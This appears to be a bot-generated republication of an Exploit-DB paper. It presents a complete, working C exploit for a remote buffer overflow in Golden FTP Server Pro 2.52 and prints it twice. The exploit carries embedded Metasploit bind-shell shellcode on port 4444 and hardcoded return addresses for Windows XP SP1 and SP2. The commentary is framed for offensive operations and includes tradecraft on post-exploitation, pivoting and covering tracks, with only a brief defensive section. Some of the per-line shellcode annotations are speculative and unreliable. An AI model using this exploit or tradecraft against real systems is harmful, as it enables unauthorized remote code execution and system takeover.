By exploitdb papers bot•April 29, 2005•
papers
Golden FTP Server Pro 2.52 Remote Buffer Overflow: A Deep Dive for Offensive Operations
Golden FTP Server Pro 2.52 Remote Buffer Overflow: A Deep Dive for Offensive Operations
What this paper is
This paper details a remote buffer overflow vulnerability in Golden FTP Server Pro version 2.52. The exploit, coded by ATmaCA, leverages this vulnerability to achieve remote code execution, specifically by opening a bind shell on port 4444 on the target system. The exploit requires knowledge of the target operating system (specifically, whether it's Windows XP SP1 or SP2 English) to select the correct return address.
Simple technical breakdown
The vulnerability lies in how the Golden FTP Server Pro handles the USER command. When a sufficiently long string is sent as the username, it overwrites a buffer on the server's stack. This overflow can be controlled to overwrite the return address, redirecting program execution to attacker-controlled code.
The exploit works by:
- Crafting a malicious
USERcommand: This command contains a large amount of padding data, followed by a specific return address that points into the server's memory, and then the attacker's shellcode. - Sending the command: The exploit sends this crafted command to the vulnerable FTP server.
- Triggering the overflow: The server, upon processing the
USERcommand, writes beyond the allocated buffer, overwriting the return address on the stack. - Executing shellcode: The overwritten return address now points to the attacker's shellcode, which is also sent as part of the
USERcommand. - Establishing a shell: The shellcode, in this case, is designed to create a bind shell on port 4444, allowing the attacker to connect back and gain a command prompt.
Complete code and payload walkthrough
Let's break down the provided C code and its components.
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include <windows.h> // For Windows API functions like WSADATA, SOCKET, etc.
#include <stdio.h> // For standard input/output functions like printf.
#pragma comment(lib, "ws2_32.lib") // Links the Winsock 2.0 library, essential for network programming.
char userreq[] =
"USER " // The start of the FTP USER command.
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // A long string of 'A' characters, forming the buffer overflow payload.
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; // This entire block of 'A's is the buffer that will overflow.
char *target[]= // An array of pointers to strings, each representing a return address for a specific OS version.
{
"\xFC\x18\xD7\x77", // WinXP Sp1 Eng - jmp esp addr. This is a hardcoded address that points to the 'jmp esp' instruction.
"\xBF\xAC\xDA\x77" // WinXP Sp2 Eng - jmp esp addr. Another 'jmp esp' address for a different OS version.
};
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
// This is the actual shellcode. It's a sequence of bytes that, when executed, will perform a specific action.
// In this case, it's a Metasploit-generated win32_bind shell.
// It aims to open a listening socket on port 4444 and execute a command shell when a connection is made.
// The comment indicates its origin and purpose.
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82" // Stage 1: Initialization and setup. Likely setting up registers and stack.
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b" // Continues setup, potentially for shellcode execution environment.
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f" // Part of the shellcode's logic for socket creation and binding.
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5" // More shellcode instructions.
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0" // Shellcode for socket operations and process spawning.
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88" // Continues the shellcode logic.
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4" // Shellcode for establishing the bind shell.
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a" // More shellcode instructions.
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6" // Shellcode for creating the listening socket.
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2" // Shellcode for accepting connections.
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b" // Shellcode for redirecting stdin/stdout/stderr to the socket.
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8" // Shellcode for spawning the command interpreter (cmd.exe).
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5" // Finalizing the shellcode execution.
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc" // This section appears to be padding or part of the shellcode's structure.
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73" // More shellcode bytes.
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9" // Shellcode for socket operations.
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67" // Shellcode for process creation.
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6" // Shellcode for command execution.
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95" // Final shellcode bytes.
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b" // Shellcode for socket operations.
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc" // Shellcode for process spawning.
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94"; // Final bytes of the shellcode.
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP (No Operation) sled. These instructions do nothing but advance the instruction pointer.
"\x90\x90\x90\x90\x90\x90\x90\x90"; // Used to increase the chances of hitting the shellcode, especially if the exact landing point is slightly off.
char passreq[] = "PASS \r\n"; // The FTP PASS command, sent after the USER command.
void main(int argc, char *argv[]) // The main function of the exploit.
{
WSADATA wsaData; // Structure to hold Windows Sockets API information.
WORD wVersionRequested; // The requested Winsock version.
struct hostent *pTarget; // Structure to hold host information.
struct sockaddr_in sock; // Structure for internet socket address.
SOCKET mysocket; // The socket descriptor.
char rec[1024]; // Buffer to receive data from the server.
// Argument checking and usage instructions
if (argc < 3)
{
printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]);
printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
printf("Exploit coded By ATmaCA\r\n");
printf("Web: atmacasoft.com && spyinstructors.com\r\n");
printf("Credit to kozan and metasploit\r\n");
printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english\n");
printf("2 - WinXP SP2 english\n");
printf("Example:exploit 2 127.0.0.1\n");
return; // Exit if not enough arguments are provided.
}
int targetnum = atoi(argv[1]) - 1; // Convert the target OS string argument to an integer and adjust for 0-based indexing.
// Buffer allocation and construction
char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
+sizeof(passreq)+7); // Allocate memory for the entire payload. +7 is for the "\r\n" and null terminator.
strcpy(evilbuf,userreq); // Start with the "USER " string.
strcat(evilbuf,target[targetnum]); // Append the chosen return address.
strcat(evilbuf,nops); // Append the NOP sled.
strcat(evilbuf,shellcode); // Append the shellcode.
strcat(evilbuf,"\r\n"); // Append the FTP command terminator.
strcat(evilbuf,passreq); // Append the "PASS \r\n" command.
//printf("%s",evilbuf); // Uncomment to print the constructed evil buffer for debugging.
// Winsock initialization
wVersionRequested = MAKEWORD(1, 1); // Request Winsock version 1.1.
if (WSAStartup(wVersionRequested, &wsaData) < 0) return; // Initialize Winsock. Exit if it fails.
// Socket creation
mysocket = socket(AF_INET, SOCK_STREAM, 0); // Create a TCP socket.
if(mysocket==INVALID_SOCKET){
printf("Socket error!\r\n");
exit(1);
}
// Host resolution
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){ // Resolve the target IP address.
printf("Resolve of %s failed\n", argv[1]); // Note: This prints argv[1] which is the target OS, not the IP. A minor bug.
exit(1);
}
// Socket configuration
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); // Copy the IP address from the host entry.
sock.sin_family = AF_INET; // Set the address family to IPv4.
sock.sin_port = htons(21); // Set the target port to 21 (FTP).
// Connection
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){ // Attempt to connect to the FTP server.
printf("Couldn't connect to host.\n");
exit(1);
}
// Communication and exploit delivery
printf("Connected!...\n");
printf("Waiting for welcome message...\n");
Sleep(10); // Short delay to allow the server to send its banner.
recv(mysocket,rec,1024,0); // Receive the server's welcome message (not used by the exploit, but good practice).
printf("Sending evil request...\n");
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){ // Send the crafted malicious buffer. strlen(evilbuf)+1 includes the null terminator.
printf("Error Sending evil request.\r\n");
closesocket(mysocket);
exit(1);
}
Sleep(10); // Short delay after sending the payload.
printf("Success.\n"); // Assumes success if no send error occurred.
closesocket(mysocket); // Close the socket.
WSACleanup(); // Clean up Winsock resources.
}
// milw0rm.com [2005-04-29]Code Fragment/Block -> Practical Purpose Mapping:
#include <windows.h>: Provides access to Windows API functions for network operations and memory management.#include <stdio.h>: Provides standard input/output functions likeprintffor user feedback.#pragma comment(lib, "ws2_32.lib"): Links the Winsock library, necessary for all network socket operations.char userreq[] = "USER AAAAA...";: Defines the beginning of the malicious FTP command. The long string of 'A's is the buffer overflow payload.char *target[] = { "\xFC\x18\xD7\x77", "\xBF\xAC\xDA\x77" };: An array holding the specific return addresses for different Windows XP service pack versions. This is crucial for redirecting execution to the shellcode.char shellcode[] = "\x31\xc9\x83\xe9\xaf...";: The actual machine code (shellcode) that will be executed on the target. This particular shellcode is a "win32_bind" shell, meaning it opens a listening port (4444) and provides a command shell when connected to.char nops[] = "\x90\x90...";: A sequence of NOP (No Operation) instructions. This creates a "NOP sled" which increases the reliability of the exploit by providing a larger area for the execution flow to land on before reaching the shellcode.char passreq[] = "PASS \r\n";: The FTP PASS command, sent as part of the FTP protocol sequence, though its content is not critical for this exploit.void main(int argc, char *argv[]): The entry point of the C program. It handles command-line arguments, initializes network components, constructs the exploit payload, and sends it.WSADATA wsaData; WORD wVersionRequested;: Variables for Winsock initialization.struct hostent *pTarget; struct sockaddr_in sock; SOCKET mysocket;: Structures and variables for network socket programming.char rec[1024];: A buffer to receive data from the server.if (argc < 3) { ... }: Checks if the correct number of command-line arguments (target OS and IP) are provided. If not, it prints usage instructions.int targetnum = atoi(argv[1]) - 1;: Converts the user-provided target OS number (e.g., "1" or "2") into a 0-based index for thetargetarray.char *evilbuf = (char*)malloc(...);: Dynamically allocates memory to construct the complete exploit payload.strcpy(evilbuf, userreq); strcat(evilbuf, target[targetnum]); ... strcat(evilbuf, passreq);: Concatenates all the parts of the exploit payload: the initialUSERcommand, the chosen return address, the NOP sled, the shellcode, and thePASScommand.WSAStartup(wVersionRequested, &wsaData);: Initializes the Winsock library.mysocket = socket(AF_INET, SOCK_STREAM, 0);: Creates a TCP socket for communication.pTarget = gethostbyname(argv[2]);: Resolves the target IP address into a network address structure.memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons(21);: Configures the socket structure with the target IP address, IPv4 family, and the standard FTP port (21).connect(mysocket, (struct sockaddr *)&sock, sizeof (sock));: Establishes a connection to the target FTP server.Sleep(10); recv(mysocket, rec, 1024, 0);: Waits briefly and receives any initial banner message from the server.send(mysocket, evilbuf, strlen(evilbuf)+1, 0);: Sends the constructed malicious payload to the server.strlen(evilbuf)+1ensures the null terminator is also sent, though for network protocols, the length is often determined by the protocol itself or explicit length fields. In this case, it's likely intended to send the entire allocated buffer.closesocket(mysocket); WSACleanup();: Cleans up network resources.
Shellcode Breakdown (Conceptual):
The shellcode[] array contains raw machine code. Without an assembler/disassembler and specific context of the target architecture and OS, a byte-by-byte analysis is extremely difficult and often impractical. However, based on the comment /* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */, we can infer its general functionality:
- Initialization: Sets up registers, potentially for stack manipulation or system calls.
- Socket Creation: Uses Windows API calls (like
socket()) to create a new socket. - Binding: Binds the created socket to a specific local address and port (4444).
- Listening: Puts the socket into a listening state to accept incoming connections.
- Accepting: Waits for and accepts an incoming connection.
- Duplicating Handles: Duplicates the socket's file descriptors to standard input, output, and error streams.
- Spawning Shell: Uses
CreateProcess()or similar to launchcmd.exe(or another shell). - Redirection: Redirects the standard input, output, and error of the spawned shell to the connected socket.
- Execution: The user can now interact with the shell via the established network connection.
The EXITFUNC=seh part of the comment suggests that the shellcode is designed to handle structured exception handling (SEH) on Windows, which is a common technique for reliable shellcode execution in overflow scenarios.
Practical details for offensive operations teams
- Required Access Level: Remote, unauthenticated access to the target FTP server (port 21).
- Lab Preconditions:
- A vulnerable Golden FTP Server Pro v2.52 instance running on a Windows XP SP1 or SP2 English machine.
- Network connectivity from the attacker's machine to the target FTP server on port 21.
- The target machine must be accessible over the network.
- Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio) to compile the exploit code.
- A network scanner (e.g., Nmap) to identify FTP services and potentially version information.
- A tool to connect to the bind shell (e.g.,
netcatortelnet).
- Execution Pitfalls:
- Incorrect Target OS: Using the wrong return address for the target OS will likely lead to a crash or unexpected behavior, not a shell.
- Firewall Blocking: Firewalls on the target network might block outbound connections to the attacker's machine on port 4444 (for the bind shell).
- Antivirus/IDS: Modern security solutions might detect the exploit traffic or the shellcode itself.
- Network Latency/Packet Loss: Unreliable network conditions could cause the exploit payload to be incomplete or corrupted, leading to failure.
- Server Restart: The vulnerable FTP service might be restarted by an administrator, requiring re-exploitation.
- Buffer Size Mismatch: If the actual buffer size on the server is slightly different than assumed by the exploit's padding, it could fail.
- ASLR/DEP: While not prevalent in 2005, modern systems with Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) would likely prevent this exploit from working without further bypass techniques.
- Tradecraft Considerations:
- Reconnaissance: Confirm the presence and version of Golden FTP Server Pro. Identify the target OS if possible.
- Payload Staging: The shellcode is embedded directly. For more stealth, a downloader shellcode could be used to fetch a larger payload from an external server.
- Post-Exploitation: Once the bind shell is established, the operator can use it to further explore the system, escalate privileges, or pivot to other systems.
- Cleanup: Ensure no lingering processes or logs that could be traced back.
Where this was used and when
This exploit was published in April 2005. Exploits of this nature were common in the early to mid-2000s, targeting vulnerabilities in widely deployed server software. While specific instances of this exact exploit being used in the wild are not detailed in the paper, it represents a typical attack vector against FTP servers of that era. Such vulnerabilities were often discovered and exploited by security researchers and, unfortunately, by malicious actors.
Defensive lessons for modern teams
- Patch Management: Keep all software, especially network-facing services like FTP servers, updated to the latest stable versions. This vulnerability was in version 2.52, indicating a significant lack of patching.
- Network Segmentation: Isolate critical services like FTP servers on their own network segments. Limit access to only necessary ports and protocols from trusted sources.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and configure IDS/IPS to detect and block known exploit patterns and suspicious network traffic.
- Vulnerability Scanning: Regularly scan your network for vulnerable software versions.
- Secure Configurations: Disable unnecessary services. If FTP is required, consider using SFTP or FTPS for encrypted and more secure file transfers.
- Endpoint Security: Modern endpoint detection and response (EDR) solutions can detect shellcode execution and suspicious process behavior.
- Application Whitelisting: Prevent unauthorized executables (like shellcode) from running.
- Modern OS Protections: Leverage ASLR, DEP, and other memory protection features that make classic buffer overflows much harder to exploit.
ASCII visual (if applicable)
+-----------------+ +-----------------+ +-----------------+
| Attacker Machine|----->| Target FTP Server|----->| Vulnerable App |
| (Exploit Code) | | (Port 21) | | (Golden FTP Svr)|
+-----------------+ +-----------------+ +-----------------+
| |
| Sends Malicious USER Command | Processes USER command
| (Overflow + Shellcode) | (Buffer Overflow)
| |
| v
| +-----------------+
| | Stack |
| | --------------- |
| | Return Address | <--- Overwritten by exploit
| | --------------- |
| | Local Variables |
| +-----------------+
| |
| v
| +-----------------+
| | Shellcode | <--- Execution jumps here
| | (Bind Shell) |
| +-----------------+
| |
| v
| +-----------------+
+------------------------------------------| Attacker Connects |
| to Port 4444 |
+-----------------+This diagram illustrates the flow: the attacker sends a crafted command to the FTP server. The server's vulnerable application overflows a buffer on the stack, overwriting the return address. This redirects execution to the embedded shellcode, which sets up a listening port (4444). The attacker then connects to this port to gain a command shell.
Source references
- Paper ID: 967
- Paper Title: Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
- Author: ATmaCA
- Published: 2005-04-29
- Keywords: Windows, remote
- Paper URL: https://www.exploit-db.com/papers/967
- Raw URL: https://www.exploit-db.com/raw/967
Original Exploit-DB Content (Verbatim)
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr
"\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr
};
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";
char passreq[] =
"PASS \r\n";
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
char rec[1024];
if (argc < 3)
{
printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]);
printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
printf("Exploit coded By ATmaCA\r\n");
printf("Web: atmacasoft.com && spyinstructors.com\r\n");
printf("Credit to kozan and metasploit\r\n");
printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english\n");
printf("2 - WinXP SP2 english\n");
printf("Example:exploit 2 127.0.0.1\n");
return;
}
int targetnum = atoi(argv[1]) - 1;
char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
+sizeof(passreq)+7);
strcpy(evilbuf,userreq);
strcat(evilbuf,target[targetnum]);
strcat(evilbuf,nops);
strcat(evilbuf,shellcode);
strcat(evilbuf,"\r\n");
strcat(evilbuf,passreq);
//printf("%s",evilbuf);
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return;
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET){
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(21);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Waiting for welcome message...\n");
Sleep(10);
recv(mysocket,rec,1024,0);
printf("Sending evil request...\n");
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
printf("Error Sending evil request.\r\n");
closesocket(mysocket);
exit(1);
}
Sleep(10);
printf("Success.\n");
closesocket(mysocket);
WSACleanup();
}
// milw0rm.com [2005-04-29]